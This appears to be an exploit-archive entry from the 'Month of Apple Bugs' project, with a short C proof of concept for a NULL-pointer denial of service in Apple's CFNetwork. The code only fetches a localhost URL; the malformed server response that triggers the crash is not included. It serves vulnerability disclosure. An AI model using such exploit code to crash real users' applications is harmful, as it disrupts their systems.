Month of Apple Bugs - C exploit that demonstrates how CFNetwork fails to handle certain HTTP responses properly, causing the _CFNetConnectionWillEnqueueRequests() function to dereference a NULL pointer, leading to a denial of service condition.
3199da9edd031aaa3b4b089d6910159ef30dde29e74ba47226c79241f26f3d3f
// gcc MOAB-25-01-2007.c -o cfnet-http -framework Carbon
#import <CoreFoundation/CoreFoundation.h>
#import <Carbon/Carbon.h>
int main() {
SInt32 ret_code;
UInt8 *myPtr;
CFDataRef myData;
CFStringRef url = CFSTR("http://localhost:8080/index.html");
printf("Requesting URL\n");
CFURLRef myURL = CFURLCreateWithString(kCFAllocatorDefault, url, NULL);
CFURLCreateDataAndPropertiesFromResource(kCFAllocatorDefault, myURL, &myData,
NULL, NULL, &ret_code);
if (myData != NULL) {
myPtr = (UInt8 *)CFDataGetBytePtr(myData);
printf("Data: %s\n", myPtr);
}
CFRelease(myURL);
CFRelease(url);
}